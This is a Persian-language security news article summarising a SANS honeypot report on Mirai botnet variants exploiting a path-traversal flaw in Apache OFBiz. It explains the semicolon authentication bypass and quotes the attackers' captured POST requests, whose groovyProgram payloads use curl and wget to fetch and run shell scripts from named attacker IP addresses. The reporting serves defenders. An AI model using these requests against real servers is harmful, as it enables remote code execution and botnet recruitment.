مرکز تحقیقاتی SANS اخیرا (سی و یکم جولای ۲۰۲۴) گزارشی منتشر کرده است که نشان میدهد چگونه فریمورک ERP منبع باز OFBiz، هدفِ نوع جدیدی از بات نت Mirai قرار گرفته است.
بنیاد آپاچی به عنوان بخشی از مجموعه پروژههای گسترده خود، از OFBiz، یک فریمورک مبتنی بر جاوا برای ایجاد اپلیکیشنهای ERP پشتیبانی میکند.
نرمافزارهای ERP (برنامهریزی منابع سازمانی) در قلب بسیاری از شرکتهای فعال در زمینه پشتیبانی از منابع انسانی، حسابداری، حمل و نقل و تولید قرار دارند. این سیستمها میتوانند بسیار پیچیده و نگهداری آنها دشوار باشد. آنها اغلب بسیار سفارشی هستند، از این رو گاهی پچ کردن آنها آسان نیست.
با این حال، آسیب پذیریهای بحرانی بر این سیستمها تأثیر میگذارند و دادههای مهم تجاری را در معرض خطر قرار میدهند.
به نظر میرسد OFBiz نسبت به دیگر نمونههای تجاری خود، بسیار کمتر رایج است اما سازمانها برای دادههای تجاری حساس مانند هر سیستم ERP دیگری، به OFBiz نیز متکی هستند و امنیت سیستمهای ERP بسیار مهم میباشد.
یک به روزرسانی امنیتی مهم در ماه می ۲۰۲۴، برای OFBiz منتشر شد. این به روزرسانی، یک آسیب پذیری پیمایش دایرکتوری[1] یا پیمایش مسیر[2] را که میتواند منجر به اجرای فرمان از راه دور شود، برطرف کرد.
پیمایش مسیر به عنوان پیمایش دایرکتوری نیز شناخته میشود. این آسیب پذیریها مهاجم را قادر میسازند تا فایلهای دلخواه همچون کد و دادههای برنامه، داده های لاگین سیستمهای بک ِاند و فایلهای حساس سیستم عامل را بر روی سروری که برنامه را اجرا میکند، بخواند.
نسخههای پیش از ۱۸.۱۲.۱۳ فریمورک OFBiz تحت تأثیر این آسیب پذیری قرار دارند. جزئیات این آسیب پذیری در اینجا منتشر شده است.
با سوء استفاده از آسیب پذیری پیمایش دایرکتوری یا پیمایش مسیر میتوان قوانین کنترل دسترسی را دور زد. برای مثال، چنانچه یک کاربر بتواند به دایرکتوری “public/” دسترسی داشته باشد اما به دایرکتوری “admin/” نَه، آنگاه مهاجم ممکن است از URLی مانند ” /public/../admin” برای فریب دادن منطق کنترل دسترسی سوء استفاده کند.
پیمایش دایرکتوری در OFBiz، به راحتی با قرار دادن نقطه ویرگول (semicolon) فعال میشود. تنها چیزی که مهاجم باید پیدا کند یک URL است که میتواند به آن دسترسی داشته باشد و یک نقطه ویرگول به دنباله آن اضافه کند. نمونه این URL به صورت زیر خواهد بود:
/webtools/control/forgotPassword;/ProgramExport
از آنجا که کاربران باید بتوانند رمزهای عبور را بدون ورود به سیستم بازنشانی کنند، “forgotPassword” نیازی به احراز هویت ندارد. از سوی دیگر، “ProgramExport” باید با دسترسی کنترل شود و قابل دسترس نباشد مگر اینکه کاربر وارد سیستم شده باشد.
منطق نقطه ویرگول بالا به هر کاربری اجازه میدهد تا بدون لاگین به سیستم، به بخش دوم URL، “/ProgramExport” دسترسی داشته باشد.
یک مهاجم باید از یک درخواست POST برای سوء استفاده از آسیب پذیری استفاده کند اما لزوماً به بدنه درخواست نیاز ندارد. در عوض، یک پارامتر URL به خوبی کار خواهد کرد.
SANS از شبکه گستردهای از هانی پاتها برای شناسایی تلاشها به منظور سوء استفاده از طیف گستردهای از آسیب پذیریهای برنامههای وب استفاده میکند. این حسگرها اخیرا افزایش قابل توجهی را در تلاش برای سوء استفاده از CVE-2024-32213، آسیبپذیری OFBiz که در بالا به آن اشاره شد، شناسایی کردهاند.
این تلاشها از دو آدرس IP مختلف نشات میگیرند که با اقدامات مختلفی برای بهرهبرداری از دستگاههای اینترنت اشیاء که معمولاً با انواع فعلی بات نت Mirai مرتبط میباشند، همراه هستند.
هکرها از دو اکسپلویت استفاده کردهاند. آنها در اولین مورد، از URL برای گنجاندن دستوری استفاده نمودند که اکسپلویت قرار بود آن را اجرا کند:
POST /webtools/control/forgotPassword;/ProgramExport?groovyProgram=groovyProgram=throw+new+Exception('curl https://95.214.27.196/where/bin.sh
مورد دوم از بدنه درخواست برای دستور استفاده کردند که بیشتر برای درخواستهای “POST” رایج است:
POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1
User-Agent: Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
Host: [victim IP address]
Accept: */*
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
groovyProgram=throw+new+Exception('curl https://185.196.10.231/sh | sh -s ofbiz || wget -O- https://185.196.10.231/sh | sh -s ofbiz'.execute().text);
متأسفانه، نَه اسکریپت “bin.sh” و نَه “sh” بازیابی نشدند. آدرسهای IP در تاریخ 29 جولای با استفاده از user agent “KrebsOnSecurity,” اسکن شدند.
با این حال، URLهای اسکن شده عمدتاً به دنبال shellهای وب موجود از حملات قبل بودند. آدرس IP همچنین برای توزیع فایلی به نام “botx.arm” استفاده شده بود. این نام فایل اغلب با انواع Mirai مرتبط میباشد.
با اینکه جمعیتی که در معرض این آسیب پذیر قرار دارند، اندک هستند اما ممکن است به انواع بات نت Mirai اضافه شوند.
CISA خاطرنشان کرده است که در حال حاضر 55 آسیب پذیری پیمایش دایرکتوری را به عنوان بخشی از کاتالوگ «آسیب پذیریهای مورد سوء استفاده شناخته شده» (KEV[3]) دنبال میکند.
[1] Directory Traversal
[2] path traversal
[3] Known Exploited Vulnerabilities
